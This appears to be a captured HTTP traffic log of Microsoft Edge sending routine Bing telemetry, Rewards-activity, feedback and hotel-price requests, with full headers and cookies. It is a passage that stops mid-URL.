https://www.bing.com/rewardsapp/reportActivity?IG=6AB2CD56EF6C4338BF41C655438BDF1B&IID=SERP.5063&q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /rewardsapp/reportActivity?IG=6AB2CD56EF6C4338BF41C655438BDF1B&IID=SERP.5063&q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531 HTTP/2.0
host: www.bing.com
content-length: 155
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _C_Auth=
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1b0b0
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum34%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum34%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1b0b1
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f34%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f34%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1b0bd
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1b0eb
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 260
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1b0ef
GET

https://www.bing.com/local/hotelprice?q=Hotels&filters=local_filters%3a%22UR4U%22+hotel_filters%3a%22LHP-0_HHP-%C2%A3500+_SD-01192025_ED-01202025%22+segment%3a%22Hotel%22+cacheid%3a%2244bd5e00-6963-40ea-85f1-37643e69d2a1%22&count=100&htlsource=localhp&originig=6AB2CD56EF6C4338BF41C655438BDF1B&inDate=01/19/2025&outDate=01/20/2025&localypids=YN2000x1190976147452155201|48.32417678833008|4.305159091949463,YN1545x256073263|48.36305618286133|4.332777976989746,YN2000x6096471577638952817|48.29521179199219|4.135970115661621,YN2000x1190976147452155201|48.32417678833008|4.305159091949463,YN1544x243384812|48.328407287597656|4.115884780883789,YN2000x9391523170225958935|48.42100524902344|4.479507923126221,YN2000x4457774376323358039|48.33100891113281|4.099302768707275,YN2000x10959879645415552720|48.45736312866211|4.123088836669922,YN2000x11722354772439687545|48.42161560058594|4.480012893676758

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /local/hotelprice?q=Hotels&filters=local_filters%3a%22UR4U%22+hotel_filters%3a%22LHP-0_HHP-%C2%A3500+_SD-01192025_ED-01202025%22+segment%3a%22Hotel%22+cacheid%3a%2244bd5e00-6963-40ea-85f1-37643e69d2a1%22&count=100&htlsource=localhp&originig=6AB2CD56EF6C4338BF41C655438BDF1B&inDate=01/19/2025&outDate=01/20/2025&localypids=YN2000x1190976147452155201|48.32417678833008|4.305159091949463,YN1545x256073263|48.36305618286133|4.332777976989746,YN2000x6096471577638952817|48.29521179199219|4.135970115661621,YN2000x1190976147452155201|48.32417678833008|4.305159091949463,YN1544x243384812|48.328407287597656|4.115884780883789,YN2000x9391523170225958935|48.42100524902344|4.479507923126221,YN2000x4457774376323358039|48.33100891113281|4.099302768707275,YN2000x10959879645415552720|48.45736312866211|4.123088836669922,YN2000x11722354772439687545|48.42161560058594|4.480012893676758 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

cache-control: private
content-length: 1
content-type: text/html
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67502a31981144feb10dd85ea57e2891
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-VHrLZGMSbf2K17ZHUcMHs3T73Favfq94HAgbmvsE0KY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 5064A75610AD4BD28FF815ADD2119083 Ref B: LON601060104052 Ref C: 2024-12-04T10:08:49Z
date: Wed, 04 Dec 2024 10:08:49 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:49 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:49 GMT; path=/; secure; HttpOnly; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1b0ed
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267502a30b43d42db97a6d5f3260af01d%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306920524%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267502a30b43d42db97a6d5f3260af01d%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306920524%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306920550%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306920550%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306920550%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B